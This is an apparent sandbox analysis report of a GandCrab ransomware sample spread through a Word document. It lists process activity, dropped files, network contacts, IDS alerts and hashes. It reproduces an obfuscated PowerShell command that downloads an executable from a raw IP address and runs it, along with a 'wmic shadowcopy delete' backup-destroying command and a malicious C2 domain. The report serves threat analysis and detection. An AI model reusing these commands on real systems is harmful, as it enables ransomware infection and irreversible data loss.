| Field | Value |
|---|---|
| File name | 6d20fce7ff12863ee648eff76a6e77e67bd78fb93fd137456ceb134de4b30be1.bin.gz |
| Full analysis | https://app.any.run/tasks/c520954d-6133-46ea-ac52-e445712bce4e |
| Verdict | Malicious activity |
| Threats | GandCrab is probably one of the most famous ransomware families. Ransomware is malware that demands payment from the victim in order to restore access to encrypted files. If the user does not cooperate, the files are lost for good. |
| Analysis date | January 23, 2019, 10:29:48 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/gzip |
| File info | gzip compressed data, max compression, from Unix |
| MD5 | 6EC3DF812B92C85421BFA9049C4D8E10 |
| SHA1 | B36E9573D95E918427B24E3D29EA7D9FD389D5A2 |
| SHA256 | A9D5BBBB5362438DF5944D02FE54DDEDC823A28E6D2B97F30D11D09F9B8DA08D |
| SSDEEP | 384:hm6mXfJ3sTNCvsVhN9QCgIcQYgCpV1Uok3o3wofYKanob1qL:hm6mXhc58YhNi3zLf1muwofYKWWM |
| Extension | File type |
|---|---|
| .z/gz/gzip | GZipped data (100) |

| Field | Value |
|---|---|
| OperatingSystem | Unix |
| ExtraFlags | Maximum Compression |
| ModifyDate | 0000:00:00 00:00:00 |
| Flags | (none) |
| Compression | Deflated |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3092 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\6d20fce7ff12863ee648eff76a6e77e67bd78fb93fd137456ceb134de4b30be1.bin.gz.z" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
| | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 | | | |
| 3332 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\6d20fce7ff12863ee648eff76a6e77e67bd78fb93fd137456ceb134de4b30be1.bin.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
| 3088 | powershell $AbR41ULTo = '65532.804050533$xJw0xyfhi = 65532.804050533n65532.804050533e65532.804050533w65532.804050533-obj65532.804050533e65532.804050533c65532.804050533t n65532.804050533e65532.804050533t65532.804050533.w65532.804050533e65532.804050533b65532.804050533cli65532.804050533ent; $xJw0xyfhi.d65532.804050533o65532.804050533w65532.804050533n65532.804050533l65532.804050533o65532.804050533a65532.804050533d65532.804050533f65532.804050533i65532.804050533le(\"65532.804050533h65532.804050533t65532.804050533t65532.804050533p65532.804050533://205.185.117.187/olalala/putty.exe\", \"c:\win65532.804050533dows\t65532.804050533emp\put65532.804050533t65532.804050533y65532.804050533.65532.804050533e65532.804050533x65532.804050533e\"); 65532.804050533s65532.804050533tar65532.804050533t-p65532.804050533r65532.804050533o65532.804050533ces65532.804050533s \"c:\win65532.804050533d65532.804050533o65532.804050533ws\temp\p65532.804050533u65532.804050533t65532.804050533t65532.804050533y.ex65532.804050533e\";'.replace('65532.804050533', $OPQJjrhbU);$uDzjkYGah = '';iex($AbR41ULTo); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WINWORD.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 2372 | "C:\windows\temp\putty.exe" | C:\windows\temp\putty.exe | | powershell.exe |
| | User: admin; Company: Nullsoft, Inc.; Integrity Level: MEDIUM; Description: Audience Need Zimmerman; Version: 3.1.22.6 | | | |
| 2464 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | | putty.exe |
| | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: WMI Commandline Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 3352 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
| | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Microsoft® Volume Shadow Copy Service; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3092 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3092.42394\6d20fce7ff12863ee648eff76a6e77e67bd78fb93fd137456ceb134de4b30be1.bin.gz | — | — | — |
| 3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD7E2.tmp.cvr | — | — | — |
| 3088 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\310IGADT6HWAIXO3EWHF.temp | — | — | — |
| 3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | FBEC01291D1C04217F7CAA3AC21438DB | 64F8E252FD26F0804E4B3FBAFD786885EB244D9FE58608564DE150996F2D929A |
| 2372 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | — | — |
| 3332 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 458562144231242DCBDED353C6FFD049 | 829B5C093E15BD489F560A69CFF4967968F9E5B001C2256ED53DB3337AEABF28 |
| 2372 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim | — | — | — |
| 2372 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.xiyshsyga | — | — | — |
| 2372 | putty.exe | C:\Recovery\XIYSHSYGA-DECRYPT.txt | text | 69B954BBAC21AB9C44ECD88D67010614 | 651D85BE695C4825A4C42F1848B689F8ECABEF2202BC4142110AD2F89A3E9A76 |
| 2372 | putty.exe | C:\MSOCache\XIYSHSYGA-DECRYPT.txt | text | 69B954BBAC21AB9C44ECD88D67010614 | 651D85BE695C4825A4C42F1848B689F8ECABEF2202BC4142110AD2F89A3E9A76 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 3088 | powershell.exe | GET | 200 | 205.185.117.187:80 | http://205.185.117.187/olalala/putty.exe | US | executable | 641 Kb | suspicious |
| 2372 | putty.exe | GET | 301 | 138.201.162.99:80 | http://www.kakaocorp.link/ | DE | html | 162 b | malicious |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2372 | putty.exe | 138.201.162.99:80 | www.kakaocorp.link | Hetzner Online GmbH | DE | malicious |
| 3088 | powershell.exe | 205.185.117.187:80 | — | FranTech Solutions | US | suspicious |
| 2372 | putty.exe | 138.201.162.99:443 | www.kakaocorp.link | Hetzner Online GmbH | DE | malicious |
| Domain | IP | Reputation |
|---|---|---|
| www.kakaocorp.link | | malicious |
| PID | Process | Class | Message |
|---|---|---|---|
| 3088 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
| 3088 | powershell.exe | Potentially Bad Traffic | ET INFO Possibly Suspicious Request for Putty.exe from Non-Standard Download Location |
| 3088 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
| 3088 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
| 3088 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |